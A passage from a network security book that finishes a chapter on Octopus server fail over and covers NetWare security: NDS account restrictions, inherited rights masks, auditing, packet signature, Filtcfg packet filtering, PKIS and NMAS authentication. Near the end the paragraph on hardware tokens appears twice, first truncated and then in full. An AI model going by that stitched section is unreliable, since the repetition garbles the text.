The final tab, Cluster To, allows you to specify the target system. If you have created a specification (as we did earlier in this configuration), this value should already be filled in and should not need to be changed. Once you have configured your Source Options, click OK to save your changes.

Finally, you need to configure the options for your target system. To do this, select Switch-Over > Target Options from the Octopus console screen. This produces the clustering Target Options dialog box, as shown in Figure 12.13.

Figure 12.13: The Target Options window

The Options tab lets you configure how the target responds when it needs to stand in for another system. You can define executables or batch processes to run when a target stands in, as well as when the source returns to operation. You can also specify whether the target should replace its IP address with that of the source or use both addresses simultaneously. If you click the Take Over tab, you will see any current sources that this target has taken over.

The Services tab allows you to specify which services should be run on the target system once a fail over has taken place. By default, all services on the target system are restarted when the target needs to stand in for a source. This allows the Octopus target to assume machine names and IP addresses as required. You can, however, specify that certain services are not to be restarted, and even set certain services to run only once a fail over takes place.

The Account tab is for entering authentication information. This is only required if the source is a stand-alone server and the target needs to provide a new Security Identifier (SID). If the source is a PDC or a BDC, this information is not required.

The Notification tab allows you to specify who should be notified when the target needs to stand in for the source. An alert can be sent to an e-mail address, to an NT logon name as a pop-up message, or even to an entire domain. Once you have finished configuring your target options, click OK to save your changes. Your source and target systems are now configured to provide server-level fault tolerance in case of disaster.
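The heartbeat mechanism configured on the Timeouts tab is worth understanding on its own terms. The following sketch is not Octopus code; it is a minimal, hypothetical illustration of the general fail over pattern, using the 15-second heartbeat interval and 60-second stand-in timeout shown in Figure 12.12:

import time

HEARTBEAT_INTERVAL = 15   # the source transmits a heartbeat every 15 seconds
STANDIN_TIMEOUT = 60      # the target tolerates 60 seconds of silence

def monitor_source(heartbeat_received):
    """Generic fail over monitor. heartbeat_received() should return True
    when a heartbeat from the source arrived during the last polling window."""
    last_heard = time.time()
    while True:
        if heartbeat_received():
            last_heard = time.time()   # any heartbeat resets the timer
        elif time.time() - last_heard > STANDIN_TIMEOUT:
            return "stand in"          # assume the source's name and IP address
        time.sleep(HEARTBEAT_INTERVAL)

Because the timeout spans four heartbeat intervals, one or two lost packets are absorbed without consequence, which is exactly the behavior the Timeouts tab settings are meant to guarantee.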
Testing Octopus

In order to show you how a fail over looks to the average end user, I configured three Octopus systems for testing. Two of them (www and holnt200) are Octopus sources, while the third (lab31) is set up as the Octopus target. Table 12.2 shows the share names being used by each system.

Table 12.2: Share Names Used on the Octopus Test Systems

Host        Configuration     Shares
www         Octopus source    hotfix, labfiles
holnt200    Octopus source    accounting, marketing, last_share
lab31       Octopus target    <none>

Once the sources were configured, the systems were allowed to sit until replication was complete. The replication process took less than 10 minutes. Once this process was complete, lab31 had a copy of every share located on the two Octopus sources. A Network Neighborhood view of these shares is shown in Figure 12.14.

Figure 12.14: Lab31 with a copy of all shares

I then pulled the power plug (literally) on servers www and holnt200 and allowed one minute to elapse for the target to figure out that these two source systems were offline (this was the configured stand-in time). At just over a minute, a notification was sent to the domain administrator that these two source systems were no longer responding. I then checked Switch-Over > Target Options > Take Over from the Octopus console screen to see whether lab31 had in fact stepped in for www and holnt200. As shown in Figure 12.15, this process had already been completed. The Added Names field shows which source systems the target has stepped in for.

Figure 12.15: The Target Options Take Over tab

To confirm that the target had stepped in for the source systems, I launched Network Neighborhood from a Windows 95 test system. As shown in Figure 12.16, the client Hellsfarr was fooled into thinking that all the servers were still online and functional. Response time for the Neighborhood search was no longer than when the servers were actually online.

Figure 12.16: Lab31 standing in for www and holnt200

Finally, both www and holnt200 were checked to insure that the correct share names were associated with the correct systems. As shown in Figure 12.17, lab31 associated the correct share names with the system www. Opening each share produced the expected list of files.

Figure 12.17: Lab31 advertising the correct shares for www

Summary

In this chapter, you saw what disaster prevention and disaster recovery options are available for protecting your network. We discussed network-based disasters and server-based disasters. We also discussed the importance of testing and documenting your disaster recovery procedures. Finally, you took a look at a product designed to provide redundant-server fault tolerance in an NT server environment.

In the next chapter we will discuss Novell NetWare, looking at what insecurities exist in the operating system and what you can do to lock it down.

Chapter 13: NetWare

Released in 1983, Novell NetWare has become the mainstay of a majority of networks for providing file and print services. As of version 4.11, Novell has included a number of IP applications that are designed to facilitate the construction of an internal Internet, known as an intranet.
An intranet provides many of the connectivity options usually associated with the Internet (HTTP, FTP, and so on), except that access to these resources is restricted to internal personnel.

As of version 5.0 (the most current version is 5.1), NetWare includes native support for the IP protocol. While NetWare has supported client communication over IP for some time through NetWareIP, NetWareIP was simply an IP tunnel carrying IPX traffic. NetWare version 5.0 allows you to remove IPX from the picture entirely.

The default security posture of a NetWare server is pretty tight. The file system supports a detailed level of permissions, and users are granted very little access to system resources by default. There are still a few things you can do, however, to increase security.

NetWare Core OS

The core of NetWare is a 32-bit, multitasking, multithreaded kernel. Symmetrical multiprocessor support is included with the core OS. The kernel is designed to be modular, which means that applications and support drivers can be loaded and unloaded on the fly.

Tip: This modularity also means that most changes can be made without rebooting the system. Need to change an IP address? This can be done with two commands at the command prompt and takes effect immediately. This can be a lifesaver in environments that cannot afford to reboot a server every time a change has been made.

As of version 5.0, NetWare includes support for Java. The Novell Java Virtual Machine (JVM) allows the server to execute Java code, so you can develop or run Java-based applications directly off the server.

NetWare versions up to 4.x were designed to run completely within the physical memory installed on the server. In other words, swap space or virtual memory was not supported, so the total memory available to the operating system was whatever was physically installed in the server.

Note: NetWare version 5.0 added support for virtual memory.

Memory never goes to waste on a NetWare server. Any memory that remains after the core OS, supporting applications, and drivers have been loaded goes to caching frequently accessed files. The more available memory, the more files can be cached. This means that when a user requests a commonly used file, the server can retrieve the information from faster memory instead of disk. When the operating system requires additional memory, it takes that memory from the file-caching pool.

Novell has also improved recovery from critical system errors, called abnormal ends or ABENDs. In previous versions of NetWare, an ABEND would cause a server to stop all processing. The only forms of recovery were to restart the server through the online debugger or to hit the power switch.

NetWare now has the ability to restart the server after a predetermined period of time if an ABEND occurs. You can even select what kind of ABEND causes a server to restart. For example, you can set the server to simply recover from application ABENDs but to perform a full system restart if the failure is hardware related.

NetWare includes a garbage collection setting. While this will not stop by your cubicle and empty your trash, it can recover server memory from unloaded processes.

With earlier versions of NetWare, if a poorly coded application was unloaded from memory, the application might not have returned all the memory it was using to the free memory pool.
This is a common problem with applications running on any operating system. The garbage collection process scans for memory areas that are no longer in use. When it finds them, the pointers are deleted and the space is returned to the free memory pool for use by other applications.

New features have been added to insure that applications do not tie up the processor(s) for an excessive amount of time. NetWare includes a relinquish control alert setting that produces an error message when an application refuses to play fair and share the available CPU cycles. There is also a CPU hog timeout setting, which allows the system to automatically kill any process monopolizing the server's processor time.

C2 Certification

NetWare is the only distributed network operating system to receive C2 certification as a trusted network component from the National Computer Security Center (NCSC). While NT is also C2 certified, at the time of this writing it is not approved as a trusted network, only as an operating system. Even then, it is certified only as a stand-alone workstation with no removable media or network connection. NetWare is also being evaluated for the European ITSEC E2 rating. E2 is the European counterpart to C2, and the specifications of each are very similar.

C2 Specifications

In order to be approved as a C2 trusted network component by the NCSC, a product is expected to meet the following specifications:
• The system must be able to uniquely identify every system user.
• The system must be able to selectively track user logons and object changes.
• The system must be able to maintain an audit log.
• The system's audit log must identify the source of all entries (which remote system, terminal, or server console).
• The system administrator must be able to restrict access to the audit log.
• The system must have a method of setting individual and group access control.
• The system administrator must have a method of limiting the propagation of access control rights.
• The system administrator must have a method of validating that the system is functioning correctly.
• The system must include a manual describing all security features.
• The security features must be tested by the NCSC and found to have no obvious flaws.

It is the final specification (no obvious flaws) that seems to trip up most systems submitted for C2 trusted network approval. C2 certification does not guarantee that your system will be impenetrable. It does, however, tell you that the product has been designed with security in mind and that these security precautions have been accepted by a third-party government agency.

NetWare Directory Services

For access control, NetWare uses NetWare Directory Services (NDS), which provides a hierarchical approach to assigning and managing network access rights. This allows an entire networking environment to be managed through a single console. NDS also provides an extremely detailed level of control over user access to network resources. An organization's NDS structure is commonly referred to as the NDS tree.

The structure of NDS is similar to the directory structure on a hard drive. Subdirectories known as Organizational Units (OUs), or containers, can be defined off the root.
Access rights can be set on each of the containers so that users have access only to the resources they need. You can define more containers to organize user access even further.

Note: It is even possible to assign subadministrators who have supervisor-type privileges for only a small portion of the tree. NDS scales extremely well because it allows a large organization to have administrators who can manage only the resources for their specific groups, while allowing full management rights to the people responsible for the entire network. Rights are assigned on a trickle-down basis, meaning a user will assume rights to all subcontainers unless you specifically set the permissions otherwise.

Network access is also centralized. When a user logs in to the network, she authenticates to the entire NDS tree, not just a specific server or portion of the tree. This means that she automatically receives access to all network resources that have been assigned to her—even if a resource exists on a remote portion of the tree (such as a printer in a remote field office).

NDS Design

For an example of how an NDS tree may be configured, take a look at Figure 13.1. The organization Cam has been broken up into five geographic locations: Albuquerque, Boise, Los Angeles, Salt Lake City, and Tampa. Any user assigned access to a geographic container can be granted access privileges to all resources at that location. If each location has its own IS staff, this is where you would create IS staff accounts. By defining these administrators within the geographic containers, you can give them access to all on-site resources while insuring that they have no access to resources at other locations. Further, you could create a small number of user accounts directly under the Cam container for the administrators who need to manage the entire tree.

Figure 13.1: An example NDS tree

At each geographic location, you could define further containers in order to structure your resources by department. This allows you to organize your network resources beyond geographic location. For example, look at the HQ container (underneath the Tampa organization) in Figure 13.1. Within the HQ container, we have defined a number of user groups as well as the printer, file, and application resources these user groups will need access to. This simplifies security management: you can organize network objects based on their access requirements.

NDS can even deal with specialized cases in which users need access to multiple containers within the tree. For example, let's say that Knikki is the accountant of Cam, Inc., and so requires access to all financial data. You do not wish to grant Knikki access to the entire NDS tree, however, because Knikki has been known to poke around where she does not belong.

In Knikki's case, you could simply create a user object for her under one of the containers (which has been done under Salt Lake City, but is not shown in the figure), then alias her user object within the other containers where she requires access. The Knikki object shown in Figure 13.1 is simply an alias that points back to the original, which allows you to make access control changes once and have them linked to all of the Knikki objects. Using aliased objects allows you to give Knikki access to the resources she needs without giving her access to the entire tree.
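Every object in an NDS tree is identified by its position within the container hierarchy. As a hypothetical illustration (the Finance Organizational Unit below is invented for this example; Cam, Salt Lake City, Tampa, and HQ come from Figure 13.1), the real Knikki object and one of her aliases might carry distinguished names such as:

.CN=Knikki.OU=Finance.OU=SaltLakeCity.O=Cam     (the original user object)
.CN=Knikki.OU=HQ.OU=Tampa.O=Cam                 (an alias pointing back to it)

Because an alias is only a pointer, a change made to the original object, such as a new password restriction or file right, takes effect everywhere the alias appears.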
Account Management

Starting with NetWare 5.0, user accounts are managed using ConsoleOne, a Java-based utility. (NetWare 4.x used NetWare Administrator, or nwadmin, and NetWare 3.x used syscon.) Because ConsoleOne can run on the server itself, it is no longer necessary to have a separate workstation to perform basic account management.

As a result, account management could not be easier. To view all security settings for a specific user, simply right-click the user object and select Details. This pulls up a user information screen similar to the one shown in Figure 13.2. As you can see, this single console lets you administer all aspects of a user account, including password restrictions, file access rights, and even the user's logon script. In the next few sections, we will look at some of the security administration you can perform through this console.

Figure 13.2: Managing the user Comodus with ConsoleOne

Identification

The Identification button allows you to record information about a user beyond his or her logon name. This information can include
• Full name
• Location
• Department
• Phone number
• Descriptive information, such as the user's direct supervisor

While the ability to record detailed user information may not seem like a security feature on the surface, it can be invaluable when you are tracking down a problem.

Let's say you are reviewing your system and you see some suspicious activity coming from the user account jsmith. It appears that jsmith may be trying to gain access to the payroll database. Using ConsoleOne, you quickly look up jsmith's account information and find out that he reports to Toby Miller at extension 1379. Armed with this information, you can give Toby a call and attempt to catch jsmith in the act.

Tip: When performing a system audit, it is extremely beneficial to have access to detailed user information. This allows you to correlate logon activity and audit log entries with actual users. In a large environment, it is extremely unlikely that a system administrator will have every user's logon name committed to memory.

Logon Restrictions

The Logon Restrictions button allows you to assign a predetermined expiration date for each account. This is useful if your organization works with temporary employees. The Logon Restrictions screen also allows you to disable an account and limit the number of concurrent connections each user may have.

Limiting the number of server connections a user can have is beneficial if you are worried about users giving out their authentication credentials. If the number of concurrent connections is limited to one, a user will be far less likely to let someone else use his logon, because once the other person logs on under his name, the user himself will be unable to log on at the same time.

Limiting concurrent connections is also a good way to identify stolen accounts. If a user attempts a logon and receives a message that he is already logged on from another system, he can inform the administrator, who can then track down the potential attacker.

Password Restrictions

The Password Restrictions button allows you to define password criteria for each user.
Here is a list of the parameters you can set on this screen:
• Allow users to change their own passwords.
• Define whether the account is required to use a password.
• Define a minimum number of characters for the password.
• Require that this account always use a unique password.
• Define how often the password must be changed.
• Define the number of incorrect logon attempts allowed before the account becomes locked.
• Change the account's current password.

Tip: Password restrictions under NDS are extremely flexible: you can define parameters on a user-by-user basis. For example, you could require regular users to use a password of at least six characters, while requiring network administrator accounts to use a 12-character password in order to make these high-level accounts more difficult to crack.

Login Time Restrictions

The Login Time Restrictions screen allows the system administrator to define when a particular user is allowed to authenticate to the NDS tree. Restrictions can be set by time of day and/or day of the week.

Note: NDS does not account for holidays.

For example, in Figure 13.3 the system administrator has limited when the user Comodus can gain access to network resources. Comodus is allowed to log on only from 7:00 AM to 6:00 PM Monday through Friday and from 8:00 AM to noon on Saturdays. During any other time period, Comodus will not be allowed to log on to the system. If he is still authenticated when an allowed time period expires, he will receive a five-minute warning and then be disconnected from the system.

Figure 13.3: The Login Time Restrictions screen

Time restrictions are an excellent way to kick users off a system before running a backup. A user who remains logged on to the system may have files open, and backup programs are typically unable to back up open files because they need exclusive access to the file information in order to insure a proper backup. By using time restrictions, you can disconnect your users from the network before launching your backup program.

Network Address Restriction

The Network Address Restriction button allows the NDS administrator to identify which systems a user may use when authenticating to the NDS tree. As shown in Figure 13.4, the administrator can restrict a user by multiple network protocols. This can insure that users are allowed to gain access to network resources only from their assigned workstations.

Figure 13.4: The Network Address Restriction screen

For example, let's say that you have an application that runs on a dedicated system and needs access to certain files on the server. Let's also assume that you would like to have this one account log on without a password, so that if the system is power cycled it can immediately regain access to network resources without waiting at the password prompt.

An account without a password is obviously a security hazard. You can, however, take precautions to insure that this account remains relatively secure. By defining a network address restriction that allows this account to log on only from the dedicated system, the account will remain secure—provided that the workstation remains physically secure.
This prevents someone from using the account to log on from another location on the network.

Intruder Lockout

The Intruder Lockout button displays a screen that shows statistics regarding failed logon attempts. The system administrator can view whether the account has been locked out due to too many incorrect password attempts. The administrator can also see how many bad password attempts took place, as well as the host address of the system used. This is extremely valuable information if you are attempting to track an intruder.

Note: Failed logon attempts can also be recorded to the audit log.

Even if an account does not become locked, the Intruder Lockout screen displays the number of failed attempts, as well as the amount of time left before the failure count is reset to zero.

Rights to Files and Directories

The Rights to Files and Directories button allows the NDS administrator to view all file and directory permissions assigned to a particular user. This is a powerful tool that lets an administrator review all of a user's assigned file access rights in one graphical display. Contrast this with Windows NT Explorer, where an administrator would be required to check every directory, on every server, one at a time.

The Rights to Files and Directories screen is shown in Figure 13.5. The top window displays the server volumes where access has been granted. The center window displays the directories on the selected volume where the user has been granted access. Finally, the bottom of the screen shows the specific rights that have been granted to this user for the highlighted directory. A description of each of the NetWare directory rights is given in Table 13.1.

Figure 13.5: The Rights to Files and Directories screen

Table 13.1: Directory Rights

Right            Description
Supervisor       Provides a combination of all other access rights
Read             Allows a user to view the contents of or execute a file
Write            Allows a user to view and modify the contents of a file
Create           Allows a user to create new files or salvage files that have been deleted
Erase            Allows a user to delete or overwrite a file
Modify           Allows a user to rename a file or change its attributes
File Scan        Allows a user to view the contents of a directory without being able to view the contents of any of the files saved within it
Access Control   Allows a user to change trustee assignments and grant access rights to other users

Note: Assigning only the Create right would allow users to copy files to a directory but not view or modify those files once they get there.

Warning: The Supervisor and Access Control rights are the ones you need to be the most careful with. The Supervisor right not only assigns full permissions, but it cannot be filtered out of subdirectories. The Access Control right allows a user to grant access rights that he himself does not even have.

Let's say you gave the user Charlie the File Scan and Access Control rights to a specific directory. Charlie could then use the Access Control right to grant Roscoe the Read, Write, and Erase rights to this directory—even though Charlie does not have these permissions himself. In fact, Charlie could grant Roscoe the Access Control right so that Roscoe could then turn around and give Charlie a full set of permissions.
The only exception is the Supervisor right, which can only be granted by an administrator equivalent.

Group Membership

The Group Membership button allows you to define which groups a user is a member of. Since access rights can be assigned to groups, it is usually easier to assign permissions to each group first, then add the users who need this level of access as members. For example, the Sales group could be assigned access to all directories containing sales-related information. When you create new users, you then simply add them to the Sales group rather than assigning specific access rights to each required directory.

Tip: If a user is associated with any groups, you will need to review each group's rights in order to get a full picture of the file areas the user has access to.

Security Equal To

The Security Equal To button allows you to view and configure all access rights that have been inherited from another user or group. This screen gives the NDS administrator a central location where all security equivalencies can be viewed.

For example, it is a common practice to make all support staff security equivalent to the NDS Admin. This gives the support staff full control of all NDS objects. While Admin equivalency needs to be reviewed on a per-user basis, having support staff use accounts separate from the administrator account is an excellent practice, because it provides accountability within the audit logs. If all support personnel are using the Admin account to make changes, you have no traceability. By giving support staff their own accounts, you are able to go back through the logs to see who made specific changes.

You should provide support personnel with two accounts: one for making administrative-level changes and the other for performing daily activities. It is far too easy for an administrator to become lax when working on a system. Unfortunately, this laxity can lead to mistakes. Users who have full system access can inadvertently cause major damage ("I deleted all files on the F: drive? Isn't it F for Floppy?").

By using an alternative account for performing administrative functions, the support person has an opportunity to wake up and focus a little more closely on the task at hand. After completing the required task, support personnel can log off and return to their regular user accounts.

File System

As you saw in the last section, most file system access is controlled through ConsoleOne. This insures that the NDS administrator can quickly identify the access rights that have been granted to each user. NetWare does, however, provide an additional utility called Filer, which allows the administrator to control the flow of access rights recursively through directories. The flow of access rights is controlled using the inherited rights mask.

Inherited Rights Mask

File system access can be tuned down to the file level. Normally, file access rights trickle down through directories. This means that if a user is given read access to a directory at a certain level, that user will also have read access to any subsequent subdirectories. NetWare provides an inherited rights mask that allows these rights to be masked out so that they do not trickle down to the included subdirectories.
This allows the system administrator to assign the precise rights required at any directory level.

For example, examine the directory structure in Figure 13.6. We have a directory named Shared located off the root of the CAM_SYS volume. Within the Shared directory are a number of subdirectories that have been broken up by department. We wish to grant users the File Scan right within the Shared directory in order to allow them to see any subdirectories they have access to. We do not, however, want to grant users File Scan rights to all of the subsequent subdirectories located under Shared.

Figure 13.6: An example directory structure

By default, any user who is granted File Scan rights to the Shared directory will automatically receive File Scan rights to the Sales and Marketing directories. This is where the inherited rights mask becomes useful: it allows you to prevent the File Scan right from trickling down to each subdirectory. By filtering out the File Scan right, you can prevent users from seeing what files are located in any directory for which they have not explicitly been granted permissions.

To create an inherited rights mask, right-click the directory within ConsoleOne, select Properties, then select the Inherited Rights Filter tab of the Properties window, as seen in Figure 13.7.

Figure 13.7: Navigating directories with Filer

If you wished to prevent the File Scan right from passing through from the Shared to the Sales directory, you would remove the File Scan right from the Sales directory's inherited rights filter.

Note: Since you have prevented the File Scan right from propagating down the subdirectories, you will need to specifically assign this right to all users whom you wish to be able to see files within a given directory.

The inherited rights mask allows you to overcome the propagation of access rights through a subdirectory structure. While propagation is usually desired, there are times when the administrator needs more granular control in order to specifically assign access rights to every directory. The inherited rights mask gives the administrator this ability.
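To make the effective-rights arithmetic concrete, here is a small worked example based on the Shared directory above (the user JSmith and his trustee assignment are hypothetical):

Trustee assignment for JSmith at CAM_SYS:Shared    [R F]  (Read, File Scan)
Inherited Rights Filter on Shared\Sales            [S R W C E M A]  (File Scan removed)
Rights JSmith inherits in Shared\Sales             [R]

The filter never grants anything; it only limits which rights are allowed to flow down from the parent directory. JSmith keeps Read in Sales because R remains in the filter, but he loses File Scan, so he cannot list the directory's contents unless you give him an explicit trustee assignment there.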
Logging and Auditing

There are several types of logs that can be generated on a NetWare server. Of most interest for security is the console log, which is created with the Conlog utility (conlog.nlm). This utility creates a log that records all console activity and error messages. The second type of log is the audit log, which is created using the Auditcon utility.

Note: A log of all ABENDs is kept in abend.log in the SYSTEM directory on a NetWare server. This log can be useful in determining whether a hacker is attempting a DoS (Denial of Service) attack by forcing your system to crash.

Auditcon

NetWare includes Auditcon, Novell's system auditing utility. Auditcon allows the system administrator, or someone designated by the system administrator, to monitor server events. Events range from user logons to password changes to specific file access; over 70 events can be monitored. The benefit of Auditcon's being a utility separate from ConsoleOne is that the administrator can designate a regular user to monitor events.

Tip: Auditcon is an excellent solution for large organizations where the person administering the network is not the same person who is monitoring security. An auditor can be designated to monitor system events without being given any other type of administration privilege.

By launching Auditcon and selecting Audit Directory Services, you can audit the tree based on specific events or a user's logon name. Figure 13.8 shows the configuration screen for selecting which NDS events you wish to monitor. For example, you could create a log entry every time a new member is added to a group or whenever the security equivalency of an object is changed.

Figure 13.8: The Auditcon Audit by DS Events screen

The ability to track a specific user is also very important. For example, you may want to log all activities performed by your administrator-level accounts. This can help you identify when access privileges are being abused or when a high-level account has been compromised.

Using Auditcon, you can even choose to audit specific file system activities. For example, in Figure 13.9 we have enabled auditing of directory deletions. You could choose to track directory deletions for a specific user or globally for everyone.

Figure 13.9: Auditcon allows you to audit specific file events.

Tip: Tracking file system activities can be extremely useful when you wish to document improper access to sensitive files.

Network Security

NetWare includes a number of methods for securing network communications. Packet signature provides a secure method for communicating with a NetWare server, while the Filtcfg utility allows the system administrator to perform basic packet filtering. Starting with NetWare 5.0, Novell has included additional technologies: Public Key Infrastructure Service (PKIS), the integration of LDAP and SSL into NDS, the Novell International Cryptographic Infrastructure (NICI), and the Novell Modular Authentication Service (NMAS).

Packet Signature

There is a type of system attack, known as connection hijacking, that has been around for a number of years. In connection hijacking, someone on the network sends information to a server and pretends that the data is coming from an administrator who is currently logged in. This allows the attacker to send commands that the server will accept, thinking they are coming from the system administrator.

Packet signature is useful in deterring this type of attack. Packet signature requires both the server and the workstation to sign each frame using a shared secret prior to transmission. The signature is determined dynamically and changes from frame to frame. The server will only accept commands from a station that is properly signing frames.

In practice, if an attacker sends commands to the server pretending to be the administrator, the server will reject and log all frames received without a valid signature. Since the correct signature is constantly changing, it is extremely difficult for an attacker to determine what to use for a signature. This feature helps to protect an administrator's connection during daily maintenance.

Note: Packet signature can also be enabled for all users.

Setting Packet Signature

Packet signature can be configured to four different security levels. These settings must be configured on both the workstation and the server.
Table 13.2 describes each of the available packet signature levels.

Table 13.2: Packet Signature Levels

Signature Level    Description
0                  Do not use packet signature.
1                  Use packet signature only if the remote system requires it.
2                  Use packet signature if the remote system supports it, but do not require signing.
3                  Do not communicate with remote systems that do not support packet signature.

By default, NetWare clients and servers are configured to use a packet signature level of 1 (sign only when required). This means that in environments where the default settings have not been changed, packet signature is not being used.

The Nomad Mobile Research Centre (NMRC) has discovered a spoofing vulnerability in packet signature similar to NT's C2MYAZZ. The exploit allows an attacker to fool a workstation and a server into not using packet signature. It is effective at every signature level except 3. Needless to say, you should insure that all workstations used by your network administrators have a packet signature level of 3.

Note: The NMRC has documented a number of vulnerabilities in Novell products. You can access its Web site at www.nmrc.org.

Set packet signature to level 3 on the server by entering the following at the console:

SET NCP Packet Signature Option=3

Set packet signature to level 3 on the client by right-clicking the small red N in the System Tray (assuming the client is Windows-based) and selecting Novell Client Properties, then Advanced Settings, then Signature Level, and finally 3.
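A SET command issued at the console does not necessarily survive a server restart. One common approach, offered here as a suggestion rather than a required procedure, is to place the command in the server's AUTOEXEC.NCF so that it is applied at every boot:

# AUTOEXEC.NCF (fragment)
# Force NCP packet signature; level 3 refuses unsigned connections
SET NCP Packet Signature Option=3

Keep in mind that a server at level 3 will refuse connections from clients that do not support packet signature, so roll out the client-side setting first.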
Filtcfg

The Filtcfg utility allows a NetWare server to act as a static packet filter. You can use packet filtering to control traffic flowing to and from the server. If you have installed two or more network cards, you can also control traffic between different network segments. Filtcfg supports the filtering of IP, IPX, and AppleTalk traffic.

In order to filter traffic, you must enable filtering support through the Inetcfg utility for each protocol you wish to filter. Once you have enabled support, you can initialize the Filtcfg utility by loading it at the server console. This produces the Filter Configuration menu shown in Figure 13.10, from which you can choose the protocol you wish to filter.

Figure 13.10: The Filter Configuration menu

If you select the TCP/IP option, you are first prompted to identify any routing protocols you wish to filter. You are also prompted for the direction of the filter. For example, you can choose to filter out certain outgoing or incoming RIP updates. The difference lies in whether you want the server itself to receive these routing updates. An incoming filter drops the update before it is received by the server. An outgoing filter allows the route to propagate to the server itself, but the server will not advertise the route through any of its other network cards.

In addition to filtering routing information, you can also perform static packet filtering. The Packet Forwarding Filters screen is shown in Figure 13.11. Filtcfg provides two methods of defining packet filters: you can specify the packets you wish to permit (the default setting), or you can specify the packets you wish to deny. In either case, you are allowed to define exceptions.

Figure 13.11: The Packet Forwarding Filters screen

For example, you could choose to configure the packets you wish to permit and specify that all traffic be allowed between the subnets 192.168.1.0 and 192.168.2.0. You could also define an exception that globally denies FTP connection requests in both directions. The combination of filters allows the system administrator to create a very complex access control policy.

If you highlight the Filters option in the Packet Forwarding Filters screen and press Enter, you are presented with a list of currently installed filters. Pressing the Insert key allows you to configure additional filter rules. The Define Filter screen is shown in Figure 13.12.

The Source Interface option lets you associate a filter rule with a specific network card. This is useful when you wish to define spoofing filters. For example, let's assume that you have an internal network address of 192.168.1.0, which is connected to the NetWare server via a 3COM card. Let's also assume that you have an SMC card that connects to a demilitarized zone. In order to prevent spoofed packets, you could define a filter rule stating that all traffic received by the SMC interface with an IP source address of 192.168.1.0 should be dropped.

Figure 13.12: The Define Filter screen

You can also define the source and destination IP addresses, the destination interface, and the type of IP packet. Highlighting the Packet Type field and pressing Enter produces the screen shown in Figure 13.13. This is a list of predefined IP packet types that you can use when creating your filter rules. If you need to filter a service that is not listed, simply press the Insert key to define a new packet type.

Figure 13.13: The Defined TCP/IP Packet Types screen

There are a number of limitations to be aware of when defining your packet filters:
• You cannot distinguish between acknowledgment (ACK=1) and session establishment (SYN=1) packets.
• You cannot define ICMP type codes.
• You cannot define support for services that use dynamic port assignments, such as RPC.

Note: Obviously, these limitations make Filtcfg a poor choice for securing an Internet connection. Filtcfg's modest packet-filtering ability may be sufficient, however, for providing security between internal network segments.

Once you have defined your filter rules, press the Escape key to exit and save (I know—it's a NetWare thing). You must now reinitialize the system in order to have your filter policy take effect.
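As a worked example, the spoofing filter described above might be entered on the Define Filter screen roughly as follows (the fields are those named in the text for Figure 13.12, but the interface labels are assumptions carried over from the example hardware):

Packet Type:            Any
Source Interface:       SMC (the card facing the demilitarized zone)
Source Address:         192.168.1.0 (mask 255.255.255.0)
Destination Interface:  Any
Destination Address:    Any

Placed in the deny list (or defined as an exception to a permit-everything policy), this rule discards any packet arriving on the DMZ interface that claims an internal source address. Since no legitimate packet can enter from the DMZ bearing an internal address, anything the rule catches is a forgery.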
Public Key Infrastructure Service (PKIS)

Novell uses PKIS to request, manage, and store certificates and key pairs in NDS. PKIS also creates an Organizational CA (Certificate Authority) specific to a particular NDS tree (and hence specific to your organization). Several other network security services rely on PKIS, including Novell Secure Authentication Service, SSL, and Novell LDAP Services. As a result, NetWare servers can use authentication and encryption to accept secure logins, verify LDAP requests (remember that LDAP is designed to allow third parties to query a given directory—in this case NDS), and encrypt network communications.

Several components make up Novell PKI, including PKI.NLM (on NetWare servers), PKI_SERVER.DLL (on NT servers), a PKI server library and NPKI (on Sun Solaris servers), and ConsoleOne, the administrative tool for PKI. After installing PKIS, some of the administrative tasks will be:

Create an Organizational CA. This consists of a public and private key, along with the certificate, certificate chain (chain of authority), and other configuration information. The private key is encrypted and stored in NDS, and the Organizational CA is represented as an object stored in the Security container of NDS.

Create a Server Certificate object. Multiple Server Certificates can be stored on a single server. A PKI-aware application can be configured to use any of the Server Certificates available on that server.

Request a public key certificate. At a minimum, a public key certificate holds a public key, a subject name and issuer name, a period of validity (the security world's equivalent of freshness dating), a serial number, and the certificate authority's digital signature.

Novell Modular Authentication Service (NMAS)

NMAS is designed to incorporate additional authentication technology into Novell's already robust security system. NMAS defines three key components: login factors, login methods and sequences, and graded authentication (although the last is really a combination of the first two).

Login Factors

Login factors are the distinct categories of evidence that can be used to authenticate a user. Consider a password; this login factor is something that you "know." How about a smart card? This is something you "have." And biometrics? That's right—something you "are." Let's look at how NMAS uses all three.

Password Authentication There are actually several technologies to support passwords. The following three choices allow an administrator to choose a method that best integrates with existing administrative policies or other implemented technologies.

NDS passwords: Username and password information is encrypted before being sent over the wire. This costs some speed and adds processor load, but it is considered the most secure option.

Clear-text: Username and password information is sent "in the clear"—in other words, without encryption. This option is available for low-security access (such as an e-mail password) as defined by the administrator.

SHA1/MD5: These technologies hash, or summarize, the information so that the data is altered before being sent across the network, yet remains cheap to compute. This option is considered moderately secure.

Physical Authentication As with the password technologies, there are multiple methods of verifying the physical presence of a user. Again, the technology you choose will depend on many factors, including policies and existing infrastructure (and, of course, cost).

Smart card: This plastic card (the general shape of a credit card, but slightly thicker) contains a microchip that can be programmed to store identification information (including digital certificates).

Token: Typically hand-held, tokens are devices that generate a unique password every time they are used (called a "one-time" password). Tokens typically rely on one of two mechanisms:

Challenge-response: After a user provides a correct username and password, the server sends a random number to the token.
Token Typically hand-held, tokens are devices that generate a unique password every time they are used (called a "one-time" password). Tokens typically rely on one of two mechanisms:

Challenge-response After a user provides a correct username and password, the server sends a random number to the token. The token returns an encrypted version of the number, using the user's encryption keys stored in the token. The server, which also has a copy of the user's encryption keys, encrypts the random number itself with those keys and then compares the results. If they match, the user is authenticated.

Time-synchronous The token and server share an algorithm that generates a common number at specific intervals. After the user successfully provides a username and password, the server prompts for the number displayed at that moment on the token. When the server verifies the expected number for that time interval, the user is authenticated.
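Both mechanisms reduce to the same idea: the token and the server can each compute a value that an eavesdropper cannot. The following minimal sketch illustrates the two schemes, assuming a per-user key shared by token and server; it is an illustration only, as real tokens use dedicated hardware and vendor-specific cryptography.

import hashlib, hmac, os, time

SHARED_KEY = b"per-user key held by both token and server"  # illustrative only

# Challenge-response: the server sends a random number; the token returns
# a keyed transform of it, which the server independently reproduces.
def token_response(challenge):
    return hmac.new(SHARED_KEY, challenge, hashlib.sha1).hexdigest()

def server_verify(challenge, response):
    return hmac.compare_digest(token_response(challenge), response)

# Time-synchronous: token and server derive the same number from the
# shared key and the current time interval (here, 60-second windows).
def one_time_code(interval=None):
    if interval is None:
        interval = int(time.time()) // 60
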